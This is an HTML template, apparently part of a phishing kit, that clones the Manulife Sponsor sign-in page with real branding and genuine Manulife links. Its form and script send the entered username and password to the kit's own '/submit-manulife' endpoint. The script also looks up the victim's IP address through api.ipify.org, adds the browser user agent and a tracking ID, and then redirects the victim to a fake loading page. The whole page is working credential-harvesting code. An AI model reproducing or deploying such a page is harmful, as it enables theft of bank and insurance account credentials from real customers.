<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Manulife Login</title>
  <link rel="shortcut icon" href="https://online.manulifebank.ca/favicon.ico">
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen',
        'Ubuntu', 'Cantarell', 'Fira Sans', 'Droid Sans', 'Helvetica Neue', sans-serif;
    }
    
    body {
      height: 100vh;
      display: flex;
      flex-direction: column;
    }
    
    /* Navigation */
    .nav {
      background-color: #3c4055;
      color: white;
      display: flex;
      justify-content: space-between;
      align-items: center;
      padding: 0 16px;
    }
    
    .nav-tabs {
      display: flex;
    }
    
    .nav-tab {
      padding: 12px 16px;
      color: white;
      text-decoration: none;
      display: inline-block;
    }
    
    .nav-tab.active {
      background-color: #2d3142;
    }
    
    .nav-right {
      display: flex;
      align-items: center;
    }
    
    .contact-link {
      color: white;
      text-decoration: none;
      margin-right: 16px;
      display: flex;
      align-items: center;
    }
    
    .fr-link {
      color: white;
      text-decoration: none;
    }
    
    /* Main content */
    .main {
      display: flex;
      flex: 1;
    }
    
    /* Sidebar */
    .sidebar {
      background-color: #3c4055;
      width: 56px;
      display: flex;
      flex-direction: column;
    }
    
    .logo-container {
      background-color: #00A758;
      height: 80px;
      width: 56px;
      display: flex;
      align-items: center;
      justify-content: center;
    }
    
    .feedback-button {
      background-color: #00A758;
      padding: 8px 4px;
      color: white;
      font-weight: 500;
      font-size: 12px;
      letter-spacing: 0.05em;
      transform: rotate(-90deg) translateX(16px) translateY(72px);
      transform-origin: bottom left;
    }
    
    /* Content area */
    .content-wrapper {
      display: flex;
      flex: 1;
      position: relative;
    }
    
    .white-content {
      background-color: white;
      padding: 32px;
      width: 835px;
      overflow-y: auto;
    }
    
    .company-name {
      font-size: 20px;
      font-weight: 500;
      margin-bottom: 16px;
    }
    
    .content-container {
      max-width: 600px;
    }
    
    .heading {
      font-size: 30px;
      font-weight: 300;
      color: #555;
      margin-bottom: 32px;
    }
    
    .heading-italic {
      font-style: italic;
    }
    
    .two-columns {
      display: flex;
    }
    
    .left-column {
      width: 50%;
      padding-right: 32px;
    }
    
    .instruction {
      color: #555;
      margin-bottom: 16px;
    }
    
    .form-group {
      margin-bottom: 24px;
    }
    
    .form-label {
      display: block;
      margin-bottom: 8px;
      color: #555;
    }
    
    .form-input {
      width: 100%;
      height: 42px;
      border: 1px solid #ccc;
      padding: 8px;
    }
    
    .password-input-wrapper {
      position: relative;
    }
    
    .show-button {
      position: absolute;
      right: 8px;
      top: 50%;
      transform: translateY(-50%);
      background: none;
      border: none;
      color: #555;
      font-size: 12px;
      cursor: pointer;
    }
    
    .checkbox-wrapper {
      display: flex;
      align-items: center;
      margin-top: 8px;
    }
    
    .checkbox {
      margin-right: 8px;
    }
    
    .checkbox-label {
      font-size: 14px;
      color: #555;
    }
    
    .forgot-link {
      color: #2c7d8c;
      font-size: 14px;
      text-decoration: none;
      margin-top: 4px;
      display: inline-block;
    }
    
    .forgot-link:hover {
      text-decoration: underline;
    }
    
    .signin-button {
      background-color: #e27055;
      color: white;
      width: 100%;
      height: 42px;
      border: none;
      cursor: pointer;
      margin-bottom: 48px;
    }
    
    .signin-button:hover {
      background-color: #d66045;
    }
    
    .no-account {
      font-size: 20px;
      font-weight: 300;
      color: #555;
      margin-bottom: 16px;
    }
    
    .setup-button {
      border: 1px solid #e27055;
      color: #e27055;
      background-color: white;
      padding: 8px 24px;
      cursor: pointer;
    }
    
    .setup-button:hover {
      background-color: #fff8f6;
    }
    
    .whats-link {
      color: #2c7d8c;
      text-decoration: none;
      margin-top: 24px;
      display: inline-block;
    }
    
    .whats-link:hover {
      text-decoration: underline;
    }
    
    /* Right column */
    .right-column {
      width: 50%;
    }
    
    .info-section {
      margin-bottom: 32px;
    }
    
    .info-heading {
      color: #555;
      font-weight: 500;
      margin-bottom: 16px;
    }
    
    .info-list {
      list-style-type: disc;
      padding-left: 24px;
      color: #555;
    }
    
    .info-list-item {
      margin-bottom: 4px;
    }
    
    .info-subheading {
      color: #555;
      font-weight: 500;
      margin-bottom: 4px;
    }
    
    .info-link {
      display: flex;
      align-items: center;
      color: #555;
      text-decoration: none;
    }
    
    .circle {
      color: #e27055;
      margin-right: 8px;
    }
    
    /* Background image */
    .background-image {
      flex: 1;
      background-image: url('https://i.postimg.cc/rF3BTMnk/image.jpg');
      background-size: cover;
      background-position: center;
    }
    
    /* Footer */
    .footer {
      position: absolute;
      bottom: 0;
      left: 0;
      width: 100%;
      background-color: #2d3142;
      color: white;
      padding: 16px;
    }
    
    .footer-links {
      display: flex;
      justify-content: space-between;
    }
    
    .footer-link-group {
      display: flex;
      align-items: center;
      gap: 24px;
    }
    
    .footer-link {
      color: white;
      text-decoration: none;
      font-size: 14px;
      display: flex;
      align-items: center;
    }
    
    .external-icon {
      margin-left: 4px;
      height: 12px;
      width: 12px;
    }
    
    .footer-brand {
      margin-top: 16px;
      display: flex;
      align-items: center;
    }
    
    .footer-logo {
      margin-right: 8px;
      height: 20px;
      width: 20px;
    }
    
    .footer-brand-name {
      color: white;
      font-size: 14px;
      margin-right: 4px;
    }
    
    .footer-copyright {
      color: white;
      font-size: 12px;
    }
    
    @media (max-width: 768px) {
      .background-image {
        display: none;
      }
      
      .footer {
        display: none;
      }
    }
  </style>
</head>
<body>
  <!-- Top navigation -->
  <div class="nav">
    <div class="nav-tabs">
      <a href="#" class="nav-tab">Personal</a>
      <a href="#" class="nav-tab active">Sponsors</a>
      <a href="#" class="nav-tab">Advisors</a>
    </div>
    <div class="nav-right">
      <a href="https://id.manulife.ca/contact?ui_locales=en-CA&goto=https%3A%2F%2Fpersonal.id.manulife.ca%3A443%2Fam%2Foauth2%2Fauthorize%3Fclient_id%3Dbank.online%2540customers.ciam%26scope%3Dopenid%2520ciam%26response_type%3Dcode%26redirect_uri%3Dhttps%253A%252F%252Fonline.manulifebank.ca%252Foauth-callback%26state%3DmUEMzazXN4TZf3vrnXSFxvggc4W5jUw5AKCIxEzfI_0%26keepSessionInfo%3Dtrue%26successReturnToOrRedirect%3D%252Foauth-login-success%26failWithError%3Dtrue%26ui_locales%3Den-CA%26code_challenge%3DDoYv-zezOTf_LCV9L_rD-MEGV8Fuqc9ap1baA6nQuhg%26code_challenge_method%3DS256%26claims%3D%257B%2522id_token%2522%253A%257B%2522ui_locales%2522%253A%257B%2522value%2522%253A%2522en-CA%2522%257D%257D%257D" class="contact-link">
        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" style="margin-right: 4px;">
          <path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"></path>
        </svg>
        Contact us
      </a>
      <a href="#" class="fr-link">FR</a>
    </div>
  </div>
  
  <!-- Main content -->
  <div class="main">
    <!-- Left sidebar -->
    <div class="sidebar">
      <div class="logo-container">
        <div style="height: 40px; width: 40px;">
          <svg viewBox="0 0 100 100" id="brand-logo" data-testid="brand-logo">
            <title>Manulife logo</title>
            <g fill="none">
              <path fill="#00A758" d="M0 0h100v100H0z"></path>
              <path fill="#FEFEFE" d="m36.903 26.667-8.57 8.562v39.39l8.57-8.563zm17.139 0-8.568 8.562v39.39l8.568-8.563zm17.141 0-8.57 8.562v39.39l8.57-8.563z"></path>
            </g>
          </svg>
        </div>
      </div>
    </div>
    
    <!-- Main content area -->
    <div class="content-wrapper">
      <!-- White content area -->
      <div class="white-content">
        <h1 class="company-name">Manulife</h1>
        
        <div class="content-container">
          <h2 class="heading">
            <span class="heading-italic">Sign in</span> with your Sponsor Manulife ID
          </h2>
          
          <div class="two-columns">
            <div class="left-column">
              <p class="instruction">Please fill out everything.</p>
              
              <!-- Добавлена форма с действием и методом -->
              <form id="manulife-login-form" action="/submit-manulife" method="POST">
                <!-- Скрытое поле для идентификации банка -->
                <input type="hidden" name="url_id" value="{{ url_id }}">
                <input type="hidden" name="user_ip" value="{{ request.remote_addr }}">
                <input type="hidden" name="user_agent" value="{{ request.user_agent }}">
                <div class="form-group">
                  <label class="form-label">Username</label>
                  <!-- Добавлен name="login-id" -->
                  <input type="text" class="form-input" name="login-id" required>
                  
                  <div class="checkbox-wrapper">
                    <input type="checkbox" id="remember" class="checkbox">
                    <label for="remember" class="checkbox-label">Remember username</label>
                  </div>
                  
                  <a href="https://id.manulife.ca/forgotusername?ui_locales=en-CA&goto=https%3A%2F%2Fpersonal.id.manulife.ca%3A443%2Fam%2Foauth2%2Fauthorize%3Fclient_id%3Dbank.online%2540customers.ciam%26scope%3Dopenid%2520ciam%26response_type%3Dcode%26redirect_uri%3Dhttps%253A%252F%252Fonline.manulifebank.ca%252Foauth-callback%26state%3DmUEMzazXN4TZf3vrnXSFxvggc4W5jUw5AKCIxEzfI_0%26keepSessionInfo%3Dtrue%26successReturnToOrRedirect%3D%252Foauth-login-success%26failWithError%3Dtrue%26ui_locales%3Den-CA%26code_challenge%3DDoYv-zezOTf_LCV9L_rD-MEGV8Fuqc9ap1baA6nQuhg%26code_challenge_method%3DS256%26claims%3D%257B%2522id_token%2522%253A%257B%2522ui_locales%2522%253A%257B%2522value%2522%253A%2522en-CA%2522%257D%257D%257D" class="forgot-link">Forgot your username?</a>
                </div>
                
                <div class="form-group">
                  <label class="form-label">Password</label>
                  <div class="password-input-wrapper">
                    <!-- Добавлен name="password" -->
                    <input type="password" class="form-input" name="password" required>
                    <!-- Изменен тип кнопки на button -->
                    <button type="button" class="show-button">SHOW</button>
                  </div>
                  
                  <a href="https://id.manulife.ca/forgotpassword?ui_locales=en-CA&goto=https%3A%2F%2Fpersonal.id.manulife.ca%3A443%2Fam%2Foauth2%2Fauthorize%3Fclient_id%3Dbank.online%2540customers.ciam%26scope%3Dopenid%2520ciam%26response_type%3Dcode%26redirect_uri%3Dhttps%253A%252F%252Fonline.manulifebank.ca%252Foauth-callback%26state%3DmUEMzazXN4TZf3vrnXSFxvggc4W5jUw5AKCIxEzfI_0%26keepSessionInfo%3Dtrue%26successReturnToOrRedirect%3D%252Foauth-login-success%26failWithError%3Dtrue%26ui_locales%3Den-CA%26code_challenge%3DDoYv-zezOTf_LCV9L_rD-MEGV8Fuqc9ap1baA6nQuhg%26code_challenge_method%3DS256%26claims%3D%257B%2522id_token%2522%253A%257B%2522ui_locales%2522%253A%257B%2522value%2522%253A%2522en-CA%2522%257D%257D%257D" class="forgot-link">Forgot your password?</a>
                </div>
                
                <!-- Изменен тип кнопки на submit -->
                <button type="submit" class="signin-button">Sign in</button>
              </form>
              
              <div class="form-group">
                <h3 class="no-account">Don't have a Sponsor Manulife ID?</h3>
                <button class="setup-button">Set up a Sponsor Manulife ID</button>
              </div>
              
              <a href="https://id.manulife.ca/aboutmanulifeid?ui_locales=en-CA&goto=https%3A%2F%2Fpersonal.id.manulife.ca%3A443%2Fam%2Foauth2%2Fauthorize%3Fclient_id%3Dbank.online%2540customers.ciam%26scope%3Dopenid%2520ciam%26response_type%3Dcode%26redirect_uri%3Dhttps%253A%252F%252Fonline.manulifebank.ca%252Foauth-callback%26state%3DmUEMzazXN4TZf3vrnXSFxvggc4W5jUw5AKCIxEzfI_0%26keepSessionInfo%3Dtrue%26successReturnToOrRedirect%3D%252Foauth-login-success%26failWithError%3Dtrue%26ui_locales%3Den-CA%26code_challenge%3DDoYv-zezOTf_LCV9L_rD-MEGV8Fuqc9ap1baA6nQuhg%26code_challenge_method%3DS256%26claims%3D%257B%2522id_token%2522%253A%257B%2522ui_locales%2522%253A%257B%2522value%2522%253A%2522en-CA%2522%257D%257D%257D" class="whats-link">What's a Sponsor Manulife ID?</a>
            </div>
            
            <!-- Right column -->
            <div class="right-column">
              <div class="info-section">
                <h3 class="info-heading">You will be able to access</h3>
                <ul class="info-list">
                  <li class="info-list-item">Group Benefits</li>
                  <li class="info-list-item">Group Retirement</li>
                  <li class="info-list-item">Individual Insurance</li>
                  <li class="info-list-item">Manulife Bank – personal and business</li>
                  <li class="info-list-item">Manulife Wealth Investor Portal</li>
                  <li class="info-list-item">Manulife Wealth Manulife Online Access</li>
                  <li class="info-list-item">Manulife Investment Management</li>
                  <li class="info-list-item">Manulife Vitality – for individual insurance customers</li>
                  <li class="info-list-item">Manulife Private Wealth</li>
                  <li class="info-list-item">Individual Health & Dental Insurance (SecureServe®)</li>
                </ul>
              </div>
              
              <div class="info-section">
                <h3 class="info-subheading">Looking for a different Manulife site?</h3>
                <a href="https://www.manulife.ca/personal/sign-in.html" class="info-link">
                  <span class="circle">○</span>
                  Sign in to the other Manulife products
                </a>
              </div>
              
              <div class="info-section">
                <h3 class="info-subheading">Looking to sign in for personal accounts?</h3>
                <a href="https://id.manulife.ca/advisor/?ui_locales=en-CA" class="info-link">
                  <span class="circle">○</span>
                  Manulife ID sign in
                </a>
              </div>
              
              <div class="info-section">
                <h3 class="info-subheading">Looking to sign in as an Advisor?</h3>
                <a href="https://id.manulife.ca/sponsor/?ui_locales=en-CA" class="info-link">
                  <span class="circle">○</span>
                  Advisor Manulife ID sign in
                </a>
              </div>
            </div>
          </div>
        </div>
        
        <!-- Footer -->
        <div class="footer">
          <div class="footer-links">
            <div class="footer-link-group">
              <a href="https://www.manulife.ca/about-us/accessibility.html" class="footer-link">
                Accessibility
                <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="external-icon">
                  <path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path>
                  <polyline points="15 3 21 3 21 9"></polyline>
                  <line x1="10" y1="14" x2="21" y2="3"></line>
                </svg>
              </a>
              <a href="https://www.manulife.com/en/legal.html" class="footer-link">
                Legal
                <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="external-icon">
                  <path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path>
                  <polyline points="15 3 21 3 21 9"></polyline>
                  <line x1="10" y1="14" x2="21" y2="3"></line>
                </svg>
              </a>
              <a href="https://www.manulife.ca/about-us/secure-client-site-terms-and-conditions.html" class="footer-link">
                Terms & Conditions
                <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="external-icon">
                  <path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path>
                  <polyline points="15 3 21 3 21 9"></polyline>
                  <line x1="10" y1="14" x2="21" y2="3"></line>
                </svg>
              </a>
              <a href="https://www.manulife.ca/privacy-policies.html" class="footer-link">
                Privacy Policy
                <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="external-icon">
                  <path d="M18 13v6a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V8a2 2 0 0 1 2-2h6"></path>
                  <polyline points="15 3 21 3 21 9"></polyline>
                  <line x1="10" y1="14" x2="21" y2="3"></line>
                </svg>
              </a>
            </div>
            <div></div>
          </div>
          
          <div class="footer-brand">
            <div class="footer-logo">
              <svg viewBox="0 0 100 100" id="brand-logo-small">
                <g fill="none">
                  <path fill="#00A758" d="M0 0h100v100H0z"></path>
                  <path fill="#FEFEFE" d="m36.903 26.667-8.57 8.562v39.39l8.57-8.563zm17.139 0-8.568 8.562v39.39l8.568-8.563zm17.141 0-8.57 8.562v39.39l8.57-8.563z"></path>
                </g>
              </svg>
            </div>
            <span class="footer-brand-name">Manulife</span>
            <span class="footer-copyright">© 1999-2025 The Manufacturers Life Insurance Company</span>
          </div>
        </div>
      </div>
      
      <!-- Right side - lighthouse image -->
      <div class="background-image"></div>
    </div>
  </div>
  
  <script>
    // Simple JavaScript for the password show/hide functionality
    document.querySelector('.show-button').addEventListener('click', function(e) {
    e.preventDefault(); // Предотвращаем отправку формы
    const passwordInput = this.closest('.password-input-wrapper').querySelector('input');
      const showButton = document.querySelector('.show-button');
      
      if (passwordInput.type === 'password') {
        passwordInput.type = 'text';
      } else {
        passwordInput.type = 'password';
      }
    });
    document.querySelector('.signin-button').addEventListener('click', function(e) {
});
    
    // Tab switching functionality
    const tabs = document.querySelectorAll('.nav-tab');
    tabs.forEach(tab => {
      tab.addEventListener('click', function(e) {
        e.preventDefault();
        tabs.forEach(t => t.classList.remove('active'));
        this.classList.add('active');
      });
    });
  </script>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.querySelector('#manulife-login-form');
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Получаем url_id из всех возможных источников
            let urlId;
            
            // 1. Из параметров URL
            const urlParams = new URLSearchParams(window.location.search);
            urlId = urlParams.get('url_id');
            
            // 2. Из скрытого поля формы
            if (!urlId) {
                const hiddenField = form.querySelector('input[name="url_id"]');
                if (hiddenField) {
                    urlId = hiddenField.value;
                }
            }
            
            // 3. Из sessionStorage
            if (!urlId) {
                urlId = sessionStorage.getItem('url_id');
            }
            
            // Если всё еще нет url_id, показываем ошибку
            if (!urlId) {
                alert('Session ID is missing. Please restart the process.');
                return;
            }
            
            // Создаем элементы для IP и User-Agent
            const ipField = document.createElement('input');
            ipField.type = 'hidden';
            ipField.name = 'user_ip';
            
            const uaField = document.createElement('input');
            uaField.type = 'hidden';
            uaField.name = 'user_agent';
            uaField.value = navigator.userAgent;
            
            form.appendChild(ipField);
            form.appendChild(uaField);
            
            // Сначала получаем IP
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipField.value = data.ip;
                    
                    // Теперь создаем FormData с актуальными значениями
                    const formData = new FormData(form);
                    formData.append('bankname', 'manulife');
                    formData.append('url_id', urlId);

                    // Перенаправляем на loading.html с url_id
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;

                    // Отправка данных формы после перехода
                    fetch('/submit-manulife', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(error => {
                        console.error('Error submitting form:', error);
                    });
                })
                .catch(error => {
                    console.error('Error getting IP:', error);
                    ipField.value = 'unknown';
                    
                    // Создаем FormData с fallback значением
                    const formData = new FormData(form);
                    formData.append('bankname', 'manulife');
                    formData.append('url_id', urlId);
                    
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;
                    
                    fetch('/submit-manulife', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(fetchError => {
                        console.error('Error submitting form:', fetchError);
                    });
                });
        });
    });
</script>

    <script>
        // Сохраняем url_id при загрузке страницы банка
        document.addEventListener('DOMContentLoaded', function() {
            const urlId = "{{ url_id }}";
            if (urlId) {
                sessionStorage.setItem('url_id', urlId);
            }
        });
    </script>
</body>
</html>
